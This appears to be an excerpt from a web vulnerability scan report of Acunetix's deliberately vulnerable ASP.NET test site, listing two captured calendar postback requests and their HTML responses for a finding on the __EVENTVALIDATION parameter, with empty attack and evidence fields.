Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8614&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDANmrrktsIZGRkiGlhD2TkgIETAtLT5eH2BgDVLvI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLt7pDfCgKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb6TfydiQdhT7aCARNke6pzAQolDA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:25 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDANmrrktsIZGRkiGlhD2TkgIETAtLT5eH2BgDVLvI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLt7pDfCgKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogb6TfydiQdhT7aCARNke6pzAQolDA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:White" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1139 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,139 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8438&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDAgkGeCNsIZGRkMix0qZVusGFTXv%2BZQ5jN0ORSOmE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLTit2ZCgLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBb%2BPxrBGLujFze%2F9L8JDk91gPsGH
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:25 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgDAgkGeCNsIZGRkMix0qZVusGFTXv+ZQ5jN0ORSOmE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLTit2ZCgLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBb+PxrBGLujFze/9L8JDk91gPsGH" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:White" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
